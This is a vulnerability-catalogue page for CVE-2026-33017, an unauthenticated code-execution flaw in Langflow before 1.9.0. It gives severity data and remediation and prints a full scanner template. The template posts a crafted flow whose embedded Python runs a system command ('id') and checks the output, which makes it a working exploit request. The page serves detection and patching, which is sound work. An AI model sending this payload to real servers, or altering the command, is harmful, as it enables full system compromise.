Langflow < 1.9.0 - Remote Code Execution
CVE-2026-33017
Verified
Description
Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
Severity
Critical
CVSS Score
9.8
Exploit Probability
23%
Affected Product
langflow
Published Date
March 24, 2026
Template Author
himind
CVE-2026-33017.yaml
id: CVE-2026-33017

info:
  name: Langflow < 1.9.0 - Remote Code Execution
  author: himind
  severity: critical
  description: |
    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
  impact: |
    Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.
  remediation: |
    Update to version 1.9.0 or later.
  reference:
    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33017
    epss-score: 0.23243
    epss-percentile: 0.9602
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: langflow
    product: langflow
    shodan-query: http.favicon.hash:1727196746
  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev

variables:
  uuid: "{{uuid}}"

flow: http(1) || http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow"
    body: |
      {
        "data": {
          "nodes": [
            {
              "data": {
                "node": {
                  "template": {
                    "code": {
                      "value": "def function():\n import os\n return os.popen('id').read()"
                    }
                  }
                }
              }
            }
          ]
        }
      }
    headers:
      Content-Type: application/json
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
          - 'contains(body, "xmsg\":")'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/version"
    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '< 1.9.0')"
          - "status_code == 200"
        condition: and
    extractors:
      - type: json
        name: version
        json:
          - ".version"
        internal: true
# digest: 490a0046304402202c786f5d24e41130904214f723a9dec406fef8b5f2cf1d63f21ef35d3dfc5ea902206865dad19e30b791151daaefe73543b7c5312dc894a218525a5389fcbf58dd51:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
CVE-2026-33017
CWE ID:
CWE-94
Remediation Steps
Update to version 1.9.0 or later.